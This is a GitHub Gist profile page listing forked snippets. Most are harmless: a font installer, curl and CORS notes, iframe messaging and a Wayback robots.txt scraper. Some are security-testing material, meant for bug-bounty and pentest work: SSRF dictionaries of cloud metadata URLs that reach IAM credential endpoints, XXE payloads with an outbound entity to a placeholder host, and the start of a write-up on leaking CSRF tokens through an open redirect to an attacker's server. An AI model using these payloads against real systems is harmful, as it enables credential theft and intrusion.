Skip to content

Instantly share code, notes, and snippets.

View adibdz's full-sized avatar

Muhamamd Adib Dzulfikar adibdz

9 followers · 20 following
View GitHub Profile
@adibdz
adibdz / install_monaco_font.sh
Created March 16, 2018 13:20 — forked from rogerleite/install_monaco_font.sh
Install Monaco font in Linux
#!/bin/bash
#script extraido de: http://paulocassiano.wordpress.com/2008/08/29/deixando-o-gedit-com-a-cara-do-textmate/
#tip for better "resolution" here: http://blog.siverti.com.br/2008/05/22/fonte-monaco-no-ubuntugedit/
cd /usr/share/fonts/truetype/
#TODO: put validation if folder already exists
sudo mkdir ttf-monaco
@adibdz
adibdz / cloud_metadata.txt
Last active May 4, 2019 19:16 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@adibdz
adibdz / XXE_payloads
Created July 14, 2019 00:17 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@adibdz
adibdz / curl.md
Created October 18, 2019 10:03 — forked from subfuzion/curl.md
curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

@adibdz
adibdz / cloud_metadata.txt
Created November 21, 2019 07:42 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@adibdz
adibdz / curl.sh
Created December 26, 2019 04:00 — forked from exAspArk/curl.sh
Test CORS with cURL
curl -I -X OPTIONS \
-H "Origin: http://EXAMPLE.COM" \
-H 'Access-Control-Request-Method: GET' \
http://EXAMPLE.COM/SOMETHING 2>&1 | grep 'Access-Control-Allow-Origin'
@adibdz
adibdz / README.md
Created May 13, 2020 04:45 — forked from pbojinov/README.md
Two way iframe communication- Check out working example here: http://pbojinov.github.io/iframe-communication/

Two way iframe communication

The main difference between the two pages is the method of sending messages. Recieving messages is the same in both.

Parent

Send messages to iframe using iframeEl.contentWindow.postMessage Recieve messages using window.addEventListener('message')

iframe

@adibdz
adibdz / waybackrobots.py
Created April 4, 2021 13:26 — forked from mhmdiaa/waybackrobots.py
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
@adibdz
adibdz / clean-up-arch-linux.md
Created May 4, 2021 20:50 — forked from rumansaleem/clean-up-arch-linux.md
Instructions to clean up Arch Linux (Manjaro)

Contents

  • Clean pkg cache
  • Remove unused packages (orphans)
  • Clean cache in /home
  • remove old config files
  • Find and Remove
    • duplicates
    • empty files
    • empty directories
  • broken symlinks
@adibdz
adibdz / csrf_jwt_redirect_leak.md
Created May 19, 2021 09:59 — forked from stefanocoding/csrf_jwt_redirect_leak.md

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user 
    GET /verify/VALUE HTTP/1.1
Host: example.com